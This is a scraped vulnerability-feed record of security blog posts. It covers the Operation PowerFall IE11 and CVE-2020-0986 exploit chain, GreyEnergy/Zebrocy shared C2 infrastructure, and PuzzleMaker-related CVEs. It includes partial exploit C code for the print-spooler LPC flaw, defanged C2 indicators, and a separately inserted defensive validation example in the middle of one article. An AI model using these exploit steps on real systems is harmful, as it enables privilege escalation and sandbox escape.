The address of the function _LinkToBeginning<ThreadContext>()_ is used to obtain the address of the first ThreadContext object in the global linked list. The exploit locates the last entry in the linked list and uses it to get the location of the stack for the thread responsible for the execution of the script. After that comes the final stage. The exploit executes the _split()_ method, and an object with an overridden _valueOf()_ method is provided as the _limit_ argument. When the overridden _valueOf()_ method is executed during the execution of the function _Js::JavascriptString::EntrySplit()_, the exploit will search the thread's stack to find the return address, place the shellcode in a prepared buffer, obtain its address, and finally build a return-oriented programming (ROP) chain to execute the shellcode by overwriting the return address of the function.\n\n## Next stage\n\nThe shellcode is a reflective DLL loader for the portable executable (PE) module that is appended to the shellcode. The module is very small in size, and the whole functionality is located inside a single function. It creates a file within a temporary folder with the name ok.exe and writes to it the contents of another executable that is present in the remote code execution exploit. After that, ok.exe is executed.\n\nThe ok.exe executable is an elevation of privilege exploit for the arbitrary pointer dereference vulnerability CVE-2020-0986 in the GDI Print / Print Spooler API. Initially, this vulnerability was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative back in December 2019. Because no patch had been released in the six months since the original report, ZDI posted a public [advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) for this vulnerability as a zero-day on May 19, 2020. 
The next day, the vulnerability was exploited in the previously mentioned attack.\n\nThe vulnerability makes it possible to read and write the arbitrary memory of the splwow64.exe process using interprocess communication, and use it to achieve code execution in the splwow64.exe process, bypassing the CFG and [EncodePointer](<https://docs.microsoft.com/en-us/previous-versions/bb432254\\(v=vs.85\\)>) protection. The exploit comes with two executables embedded in its resources. The first executable is written to disk as CreateDC.exe and is used to create a device context (DC), which is required for exploitation. The second executable has the name PoPc.dll and if the exploitation is successful, it is executed by splwow64.exe with a medium integrity level. We will provide further details on CVE-2020-0986 and its exploitation in a follow-up post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155838/sl_ie11_and_windows_02.png>)\n\n**_Execution of a malicious PowerShell command from splwow64.exe_**\n\nThe main functionality of PoPc.dll is also located inside a single function. It executes an encoded PowerShell command that proceeds to download a file from www[.]static-cdn1[.]com/update.zip, saves it to the temporary folder as upgrader.exe and executes it. 
We were unable to analyze upgrader.exe because Kaspersky technologies prevented the attack before the executable was downloaded.\n\n## IoCs\n\n[www[.]static-cdn1[.]com/update.zip](<https://opentip.kaspersky.com/www.static-cdn1.com%2Fupdate.zip/>)", "cvss3": {}, "published": "2020-08-12T07:00:28", "type": "securelist", "title": "Internet Explorer and Windows zero-day exploits used in Operation PowerFall", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-8653", "CVE-2019-0676", "CVE-2019-1429", "CVE-2020-0674", "CVE-2020-0986", "CVE-2020-1380"], "modified": "2020-08-12T07:00:28", "id": "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "href": "https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T16:17:54", "description": "\n\nIn August 2020, we published a blog post about 
[Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). This targeted attack consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer 11 and an elevation of privilege exploit targeting the latest builds of Windows 10. While we already described the exploit for Internet Explorer in the original blog post, we also promised to share more details about the elevation of privilege exploit in a follow-up post. Let's take a look at vulnerability CVE-2020-0986, how it was exploited by attackers, how it was fixed and what additional mitigations were implemented to complicate exploitation of many other similar vulnerabilities.\n\n## CVE-2020-0986\n\nCVE-2020-0986 is an arbitrary pointer dereference vulnerability in [GDI Print](<https://docs.microsoft.com/en-us/windows/win32/printdocs/about-the-gdi-print-api>)/[Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler-api>) API. By using this vulnerability it is possible to manipulate the memory of the splwow64.exe process to achieve execution of arbitrary code in the process and escape the Internet Explorer 11 sandbox because splwow64.exe is running with medium integrity level. "Print driver host for applications," as Microsoft describes splwow64.exe, is a relatively small binary that hosts 64-bit user-mode printer drivers and implements the Local Procedure Call (LPC) server that can be used by other processes to access printing functions. This allows the use of 64-bit printer drivers from 32-bit processes. 
Below I provide the code that can be used to spawn splwow64.exe and connect to splwow64.exe's LPC server.\n \n \n typedef struct _PORT_VIEW\n {\n \tUINT64 Length;\n \tHANDLE SectionHandle;\n \tUINT64 SectionOffset;\n \tUINT64 ViewSize;\n \tUCHAR* ViewBase;\n \tUCHAR* ViewRemoteBase;\n } PORT_VIEW, *PPORT_VIEW;\n \n PORT_VIEW ClientView;\n \n typedef struct _PORT_MESSAGE_HEADER {\n \tUSHORT DataSize;\n \tUSHORT MessageSize;\n \tUSHORT MessageType;\n \tUSHORT VirtualRangesOffset;\n \tCLIENT_ID ClientId;\n \tUINT64 MessageId;\n \tUINT64 SectionSize;\n } PORT_MESSAGE_HEADER, *PPORT_MESSAGE_HEADER;\n \n typedef struct _PROXY_MSG {\n \tPORT_MESSAGE_HEADER MessageHeader;\n \tUINT64 InputBufSize;\n \tUINT64 InputBuf;\n \tUINT64 OutputBufSize;\n \tUINT64 OutputBuf;\n \tUCHAR Padding[0x1F8];\n } PROXY_MSG, *PPORT_MESSAGE;\n \n PROXY_MSG LpcReply;\n PROXY_MSG LpcRequest;\n \n int GetPortName(PUNICODE_STRING DestinationString)\n {\n \tvoid *tokenHandle;\n \tDWORD sessionId;\n \tULONG length;\n \n \tint tokenInformation[16];\n \tWCHAR dst[256];\n \n \tmemset(tokenInformation, 0, sizeof(tokenInformation));\n \tProcessIdToSessionId(GetCurrentProcessId(), &sessionId);\n \n \tmemset(dst, 0, sizeof(dst));\n \n \tif (NtOpenProcessToken(GetCurrentProcess(), READ_CONTROL | TOKEN_QUERY, &tokenHandle)\n \t\t|| ZwQueryInformationToken(tokenHandle, TokenStatistics, tokenInformation, sizeof(tokenInformation), &length))\n \t{\n \t\treturn 0;\n \t}\n \n \twsprintfW(\n \t\tdst,\n \t\tL\"\\\\RPC Control\\\\UmpdProxy_%x_%x_%x_%x\",\n \t\tsessionId,\n \t\ttokenInformation[2],\n \t\ttokenInformation[3],\n \t\t0x2000);\n \tRtlInitUnicodeString(DestinationString, dst);\n \n \treturn 1;\n }\n \n HANDLE CreatePortSharedBuffer(PUNICODE_STRING PortName)\n {\n \tHANDLE sectionHandle = 0;\n \tHANDLE portHandle = 0;\n \tunion _LARGE_INTEGER maximumSize;\n \tmaximumSize.QuadPart = 0x20000;\n \n \tNtCreateSection(&sectionHandle, SECTION_MAP_WRITE | SECTION_MAP_READ, 0, &maximumSize, PAGE_READWRITE, SEC_COMMIT, 
NULL);\n \tif (sectionHandle)\n \t{\n \t\tClientView.SectionHandle = sectionHandle;\n \t\tClientView.Length = 0x30;\n \t\tClientView.ViewSize = 0x9000;\n \t\tZwSecureConnectPort(&portHandle, PortName, NULL, &ClientView, NULL, NULL, NULL, NULL, NULL);\n \t}\n \n \treturn portHandle;\n }\n \n int main()\n {\n \tprintf(\"Spawn splwow64.exe\\n\");\n \tCHAR Path[0x100];\n \tGetCurrentDirectoryA(sizeof(Path), Path);\n \tPathAppendA(Path, \"CreateDC.exe\"); // x86 application with call to CreateDC\n \tWinExec(Path, 0);\n \tSleep(1000);\n \n \tCreateDCW(L\"Microsoft XPS Document Writer\", L\"Microsoft XPS Document Writer\", NULL, NULL);\n \n \tprintf(\"Get port name\\n\");\n \tUNICODE_STRING portName;\n \tif (!GetPortName(&portName))\n \t{\n \t\tprintf(\"Failed to get port name\\n\");\n \t\treturn 0;\n \t}\n \n \tprintf(\"Create port\\n\");\n \tHANDLE portHandle = CreatePortSharedBuffer(&portName);\n \tif (!(portHandle && ClientView.ViewBase && ClientView.ViewRemoteBase))\n \t{\n \t\tprintf(\"Failed to create port\\n\");\n \t\treturn 0;\n \t}\n }\n\nTo send data to the LPC server it's enough to prepare the printer command in the shared memory region and send an LPC message with NtRequestWaitReplyPort().\n \n \n memset(&LpcRequest, 0, sizeof(LpcRequest));\n LpcRequest.MessageHeader.DataSize = 0x20;\n LpcRequest.MessageHeader.MessageSize = 0x48;\n \n LpcRequest.InputBufSize = 0x88;\n LpcRequest.InputBuf = (UINT64)ClientView.ViewRemoteBase; // Points to printer command\n LpcRequest.OutputBufSize = 0x10;\n LpcRequest.OutputBuf = (UINT64)ClientView.ViewRemoteBase + LpcRequest.InputBufSize;\n \n // TODO: Prepare printer command\n \n NtRequestWaitReplyPort(portHandle, &LpcRequest, &LpcReply);\n\nWhen the LPC message is received, it is processed by the function TLPCMgr::ProcessRequest(PROXY_MSG *). This function takes _LpcRequest_ as a parameter and verifies it. After that it allocates a buffer for the printer command and copies it there from shared memory. 
The printer command function INDEX, which is used to identify different driver functions, is stored as a double word at offset 4 in the printer command structure. An almost complete list of different function INDEX values can be found in the header file _winddi.h_. This header file includes different INDEX values from INDEX_DrvEnablePDEV (0) up to INDEX_LAST (103), but the full list of INDEX values does not end there. Analysis of gdi32full.dll reveals that there are a number of special INDEX values, and some of them are provided in the table below (to find them in the binary, look for calls to PROXYPORT::SendRequest).\n \n \n 106 \u2013 INDEX_LoadDriver\n 107 \u2013 INDEX_UnloadDriver\n 109 \u2013 INDEX_DocumentEvent\n 110 \u2013 INDEX_StartDocPrinterW\n 111 \u2013 INDEX_StartPagePrinter\n 112 \u2013 INDEX_EndPagePrinter\n 113 \u2013 INDEX_EndDocPrinter\n 114 \u2013 INDEX_AbortPrinter\n 115 \u2013 INDEX_ResetPrinterW\n 116 \u2013 INDEX_QueryColorProfile\n\nFunction TLPCMgr::ProcessRequest(PROXY_MSG *) checks the function INDEX value and, if it passes the checks, the printer command will be processed by function GdiPrinterThunk in gdi32full.dll.\n \n \n if ( IsKernelMsg || INDEX >= 106 && (INDEX <= 107 || INDEX - 109 <= 7))\n {\n     // \u2026\n     GdiPrinterThunk(LpcRequestInputBuf, LpcRequestOutputBuf, LpcRequestOutputBufSize);\n }\n\nGdiPrinterThunk itself is a very large function that processes more than 60 different function INDEX values, and the handler for one of them \u2013 namely INDEX_DocumentEvent \u2013 contains vulnerability CVE-2020-0986. The handler for INDEX_DocumentEvent will use information provided in the printer command (fully controllable from the LPC client) to check that the command is intended for a printer with a valid handle. 
After the check it will use the function DecodePointer to decode the pointer of the function stored at the _fpDocumentEvent_ global variable (located in .data segment), then use the decoded pointer to execute the function, and finally perform a call to memcpy() where source, destination and size arguments are obtained from the printer command and are fully controllable by the attacker.\n\n## Exploitation\n\nIn Windows OS the base addresses of system DLL libraries are randomized with each boot, aiding exploitation of this vulnerability. The exploit loads the libraries gdi32full.dll and winspool.drv, and then obtains the offset of the _fpDocumentEvent_ pointer from gdi32full.dll and the address of the DocumentEvent function from winspool.drv. After that the exploit performs a number of LPC requests with specially crafted INDEX_DocumentEvent commands to leak the value of the _fpDocumentEvent_ pointer. The value of the raw pointer is protected using [EncodePointer](<https://docs.microsoft.com/en-us/previous-versions/bb432254\\(v=vs.85\\)>) protection, but the function pointed to by this raw pointer is executed each time the INDEX_DocumentEvent command is sent and the arguments of this function are fully controllable. All this makes the _fpDocumentEvent_ pointer the best candidate for an overwrite. A necessary step for exploitation is to encode our own pointer in such a manner that it will be properly decoded by the function DecodePointer. Since we have the value of the encoded pointer and the value of the decoded pointer (address of the DocumentEvent function from winspool.drv), we are able to calculate the secret constant used for pointer encoding and then use it to encode our own pointer. 
The necessary calculations are provided below.\n \n \n // Calculate secret for pointer encoding\n while (1)\n {\n \tsecret = (unsigned int)DocumentEvent ^ __ROL8__(*(UINT64*)leaked_fpDocumentEvent, i & 0x3F);\n \tif ((secret & 0x3F) == i && __ROR8__((UINT64)DocumentEvent ^ secret, secret & 0x3F) == *(UINT64*)leaked_fpDocumentEvent)\n \t\tbreak;\n \tif (++i > 0x3F)\n \t{\n \t\tsecret = 0;\n \t\tbreak;\n \t}\n }\n \n // Encode LoadLibraryA pointer with calculated secret\n UINT64 encodedPtr = __ROR8__(secret ^ (UINT64)LoadLibraryA, secret & 0x3F);\n\nAt this stage, in order to achieve code execution from the splwow64.exe process, it's sufficient to overwrite the _fpDocumentEvent_ pointer with the encoded pointer of function LoadLibraryA and provide the name of a library to load in the next LPC request with the INDEX_DocumentEvent command.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31152055/sl_operation_powerfall_01.png>)\n\n**_Overview of attack_**\n\n## CVE-2019-0880\n\nAnalysis of CVE-2020-0986 reveals that this vulnerability is the twin brother of the previously discovered CVE-2019-0880. The write-up for CVE-2019-0880 is available [here](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>). It's another vulnerability that was exploited as an in-the-wild zero-day. CVE-2019-0880 is just another fully controllable call to memcpy() in the same GdiPrinterThunk function, just a few lines of code away in a handler of function INDEX 118. It seems hard to believe that the developers didn't notice the existence of a variant for this vulnerability, so why was CVE-2020-0986 not patched back then and why did it take so long to fix it? It may not be obvious on first glance, but GdiPrinterThunk is totally broken. 
Even fixing a couple of calls to memcpy doesn't really help.\n\n## Arbitrary pointer dereference host for applications\n\nThe problem lies in the fact that almost every function INDEX in GdiPrinterThunk is susceptible to a potential arbitrary pointer dereference vulnerability. Let's take a look again at the format of the LPC request message.\n \n \n typedef struct _PROXY_MSG {\n \tPORT_MESSAGE_HEADER MessageHeader;\n \tUINT64 InputBufSize;\n \tUINT64 InputBuf;\n \tUINT64 OutputBufSize;\n \tUINT64 OutputBuf;\n \tUCHAR Padding[0x1F8];\n } PROXY_MSG, *PPORT_MESSAGE;\n\n_InputBuf_ and _OutputBuf_ are both pointers that should point to a shared memory region. _InputBuf_ points to a location where the printer command is prepared, and when this command is processed by GdiPrinterThunk the result might be written back to the LPC client using the pointer that was provided as _OutputBuf_. Many handlers for different INDEX values provide data to the LPC client, but the problem is that the pointers _InputBuf_ and _OutputBuf_ are fully controllable from the LPC client and manipulation of the _OutputBuf_ pointer can lead to an overwrite of splwow64.exe's process memory.\n\n## How it was mitigated\n\nMicrosoft fixed CVE-2020-0986, but also implemented a mitigation aimed to make exploitation of _OutputBuf_ vulnerabilities as hard as possible. Before the patch the function FindPrinterHandle() blindly trusted the data provided through the printer command in an LPC request and it was easy to bypass a valid handle check. After the patch the format of the printer command was changed so it no longer contains the address of the handle table, but instead contains a valid driver ID (quad word at offset 0x18). Now the linked list of handle tables is stored inside the splwow64.exe process and the new function FindDriverForCookie() uses the provided driver ID to get a handle table securely. 
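As an added example (not code from the article or from splwow64.exe), here is a C model of the validation an LPC server in the position of TLPCMgr::ProcessRequest() needs before GdiPrinterThunk() touches InputBuf and OutputBuf: both buffers must lie inside the client's mapped section, the INDEX must be in the accepted set quoted above, and the driver ID (offset 0x18) and printer handle (offset 0x20) must match a server-side record, in the spirit of the post-fix FindDriverForCookie(). The driver table, the remote base address, the minimum command size and the error codes are constructed for the demo.

```c
/* Added C model (not from the article or splwow64.exe) of the checks an LPC
 * server needs before GdiPrinterThunk() uses a client-supplied request.
 * Structures follow the article; table contents, addresses and the minimum
 * command size are constructed for the demo. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Request body after PORT_MESSAGE_HEADER, as in PROXY_MSG above. */
typedef struct {
    uint64_t InputBufSize;
    uint64_t InputBuf;        /* remote address of the printer command */
    uint64_t OutputBufSize;
    uint64_t OutputBuf;       /* remote address for the reply data */
} proxy_body_t;

/* The client's shared section as the server mapped it: the only memory a
 * client may legitimately name in InputBuf or OutputBuf. */
typedef struct { uint64_t remote_base; uint64_t size; unsigned char *local; } section_view_t;

/* Server-side driver record looked up by driver ID (hypothetical layout). */
typedef struct { uint64_t driver_id; uint64_t printer_handle; } driver_rec_t;

enum { V_OK = 0, V_RANGE, V_INDEX, V_DRIVER, V_HANDLE };
#define CMD_MIN_SIZE 0x28   /* must cover INDEX@4, driver ID@0x18, handle@0x20 */

/* The INDEX filter quoted above: 106..107 and 109..116 reach GdiPrinterThunk. */
static int index_allowed(uint32_t index) {
    return (index >= 106 && index <= 107) || (index >= 109 && index <= 116);
}

/* [ptr, ptr+len) must lie inside the view; written so the arithmetic cannot wrap. */
static int inside_view(const section_view_t *v, uint64_t ptr, uint64_t len) {
    if (len == 0 || len > v->size || ptr < v->remote_base) return 0;
    uint64_t off = ptr - v->remote_base;
    return off <= v->size - len;
}

static const driver_rec_t *find_driver(const driver_rec_t *tbl, size_t n, uint64_t id) {
    for (size_t i = 0; i < n; i++)
        if (tbl[i].driver_id == id) return &tbl[i];
    return NULL;
}

/* Validate a request; the command is read through the server's own mapping,
 * never through the client-supplied pointer. */
static int validate_request(const proxy_body_t *m, const section_view_t *v,
                            const driver_rec_t *tbl, size_t n) {
    if (m->InputBufSize < CMD_MIN_SIZE) return V_RANGE;
    if (!inside_view(v, m->InputBuf, m->InputBufSize)) return V_RANGE;
    if (!inside_view(v, m->OutputBuf, m->OutputBufSize)) return V_RANGE;

    const unsigned char *cmd = v->local + (m->InputBuf - v->remote_base);
    uint32_t index; uint64_t drv, handle;
    memcpy(&index,  cmd + 4,    sizeof index);
    memcpy(&drv,    cmd + 0x18, sizeof drv);
    memcpy(&handle, cmd + 0x20, sizeof handle);

    if (!index_allowed(index)) return V_INDEX;
    const driver_rec_t *d = find_driver(tbl, n, drv);
    if (!d) return V_DRIVER;
    if (d->printer_handle != handle) return V_HANDLE;
    return V_OK;
}

/* Constructed scenarios. Case 0 is a well-formed INDEX_DocumentEvent request;
 * the others each break one rule. Returns the validation result. */
static int demo_case(int which) {
    static unsigned char shared[0x9000];            /* ViewSize used by the article */
    section_view_t view = { 0x7ff0000000ull, sizeof shared, shared };  /* base constructed */
    driver_rec_t tbl[1] = { { 0x1122334455667788ull, 0x00001f3c00a0b0c0ull } };
    proxy_body_t m = { 0x88, view.remote_base, 0x10, view.remote_base + 0x88 };
    uint32_t index = 109;                           /* INDEX_DocumentEvent */
    uint64_t drv = tbl[0].driver_id, handle = tbl[0].printer_handle;

    switch (which) {
    case 1: m.OutputBuf = 0x10000; break;                         /* outside the section */
    case 2: m.OutputBuf = view.remote_base + view.size - 8; break; /* straddles the end */
    case 3: drv ^= 1; break;                                      /* unknown driver ID */
    case 4: index = 108; break;                                   /* INDEX not accepted */
    case 5: handle ^= 1; break;                                   /* handle mismatch */
    default: break;
    }
    memset(shared, 0, sizeof shared);
    memcpy(shared + 4,    &index,  sizeof index);
    memcpy(shared + 0x18, &drv,    sizeof drv);
    memcpy(shared + 0x20, &handle, sizeof handle);
    return validate_request(&m, &view, tbl, 1);
}

int main(void) {
    for (int i = 0; i <= 5; i++)
        printf("case %d -> result %d\n", i, demo_case(i));
    return 0;
}
```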
For a printer command to be processed it should contain a valid printer handle (quad word at offset 0x20). The printer handle consists of process ID and the address of the buffer allocated for the printer driver. It is possible to guess some bytes of the printer handle, but a successful real-world brute-force attack on this implementation seems to be unlikely. So, it's safe to assume that this bug class was properly mitigated. However, there are still a couple of places in the code where it is possible to write a 0 for the address provided as _OutputBuf_ without a handle check, but exploitation in such a scenario doesn't appear to be feasible.", "cvss3": {}, "published": "2020-09-02T10:00:56", "type": "securelist", "title": "Operation PowerFall: CVE-2020-0986 and variants", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0880", "CVE-2020-0986"], "modified": "2020-09-02T10:00:56", "id": "SECURELIST:C65BBC029B301149C73E48F99596B4A0", "href": "https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-24T16:53:08", "description": "\n\nIn October 2018, ESET published a[ report](<https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf>) describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.\n\n[Kaspersky Lab ICS CERT](<https://ics-cert.kaspersky.com/>) has identified an overlap between GreyEnergy and a Sofacy subset called [\"Zebrocy\"](<https://securelist.com/a-slice-of-2017-sofacy-activity/83930/>). 
The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy's targets are widely spread across the Middle East, Europe and Asia and the targets' profiles are mostly government-related.\n\nBoth sets of activity used the same servers at the same time and targeted the same organization.\n\n## **Details**\n\n### **Servers**\n\nIn our private APT Intel report from July 2018 \"Zebrocy implements new VBA anti-sandboxing tricks\", details were provided about different Zebrocy C2 servers, including **193.23.181[.]151**.\n\nIn the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \neae0b8997c82ebd93e999d4ce14dedf5 \na5cbf5a131e84cd2c0a11fca5ddaa50a \nc9e1b0628ac62e5cb01bf1fa30ac8317\n\nThe URL used to download additional data looks as follows:\n\nhxxp://**193.23.181**[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nThis same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a [FireEye report](<https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html>). Details on this attachment are as follows:\n\n * The file (11227eca89cc053fb189fac3ebf27497) with the name \"Seminar.rtf\" exploited CVE-2017-0199\n * \"Seminar.rtf\" downloaded a second stage document from: hxxp://**193.23.181[.]151**/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)\n * The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://**193.23.181[.]151**/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf\n\nAnother server we detected that was used both by Zebrocy and by GreyEnergy is **185.217.0[.]124**. 
Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named \"Seminar.rtf\".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125754/190123-GreyEnergy_overlap-1.png>)\n\n_\"Seminar.rtf\", a GreyEnergy decoy document_\n\nThis document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:\n\n\\\\\\**185.217.0[.]124**\\Doc\\Seminar\\Seminar_2018_1.AO-A\n\nThe following Zebrocy samples use this server as C2:\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \n3803af6700ff4f712cd698cee262d4ac \ne3100228f90692a19f88d9acb620960d\n\nThey retrieve additional data from the following URL:\n\nhxxp://**185.217.0[.]124**/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nIt is worth noting that at least two samples from the above list use both **193.23.181[.]151** and **185.217.0[.]124** as C2s.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125807/190123-GreyEnergy_overlap-2.png>)\n\n_Hosts associated with GreyEnergy and Zebrocy_\n\n### **Attacked company**\n\nAdditionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. 
One of them was attacked in June 2018.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/24083359/190124-GreyEnergy_overlap-3.png>)\n\n_GreyEnergy and Zebrocy overlap_\n\n### **Attack timeframe**\n\nA spearphishing document entitled 'Seminar.rtf', which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125842/190123-GreyEnergy_overlap-4.png>)\n\n_'(28.06.18) Izmeneniya v prikaz PK.doc' Zebrocy decoy document translation: _ \n_'Changes to order, Republic of Kazakhstan'_\n\nThe two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:\n\n * 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018\n * 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018\n\n## **Conclusions**\n\nThe GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge of penetrating its victims' networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.\n\nThough no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. 
In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship's existence.\n\nFor more information about APT reports please contact: intelreports@kaspersky.com \n\nFor more information about ICS threats please contact: [ics-cert@kaspersky.com](<mailto:ics-cert@kaspersky.com>)", "cvss3": {}, "published": "2019-01-24T09:00:47", "type": "securelist", "title": "GreyEnergy\u2019s overlap with Zebrocy", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882"], "modified": "2019-01-24T09:00:47", "id": "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "href": "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2023-01-24T20:16:01", "description": "Windows Kernel Information Disclosure Vulnerability \nThe type of information that could be disclosed if an attacker successfully exploited this vulnerability is the contents of Kernel memory. An attacker could read the contents of Kernel memory from a user mode process.\n\nThe team at Kaspersky have reported threat actors are exploiting this Microsoft Windows OS kernel vulnerability\n\nSource: <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 3:23pm UTC reported:\n\nAh good old `NtQuerySystemInformation()` strikes again, never quite going out of style :) In this case CVE-2021-31955 is an information disclosure in good old `ntoskrnl.exe`, aka the Windows kernel itself, that occurs due to a Windows feature supported since Windows Vista known as SuperFetch. 
By sending a `SystemSuperfetchInformation` class request of type `SuperfetchPrivSourceQuery` via the undocumented `NtQuerySystemInformation()` function, one can obtain the kernel address of the `EPROCESS` structure for the current process. This is REALLY bad since the `EPROCESS` kernel structure also contains a pointer to the process\u2019s permissions token. If we know the address of this token, then, provided one has an arbitrary kernel write vulnerability, they can easily overwrite this pointer to point to the permissions token for a higher privilege process, and if this process is running as SYSTEM, they will gain SYSTEM level code execution.\n\nAccording to <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>, this was used in the wild alongside CVE-2021-31956 to escape the Chrome sandbox and gain SYSTEM on affected users\u2019 computers, after first compromising Chrome and gaining execution inside the Chrome sandbox with what is suspected to be CVE-2021-21224.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31955", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "AKB:21C170FF-C7C6-4BFB-8AED-613970EDA44C", "href": "https://attackerkb.com/topics/NQpSb1TpCN/cve-2021-31955", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-25T11:15:03", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 3:06pm UTC reported:\n\nAccording to <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/> this appears to have been used along with CVE-2021-31955 and CVE-2021-31956, a Windows kernel information leak and a Windows LPE vulnerability, to form a full RCE to go from a user browsing a web page to full SYSTEM control over a target Windows device. This is an extremely powerful and valuable exploit chain, and many exploit brokers are willing to pay large sums of money for these chains as they often are very valuable to nation states who wish to use them for their intelligence operations.\n\nOverall though, on its own it seems like this bug wasn\u2019t super valuable as you only get RCE within the sandbox itself, which is why it was then chained with a Windows kernel bug to escape the Chrome sandbox and gain RCE as SYSTEM on the target device. Therefore the risk for this vulnerability alone is lower, however if we keep in mind the other bugs that existed at the time, the overall risk is quite high.\n\nThere also appears to have been public exploit code available for this vulnerability, available at <https://github.com/avboy1337/1195777-chrome0day>, which was potentially reused by the attackers. 
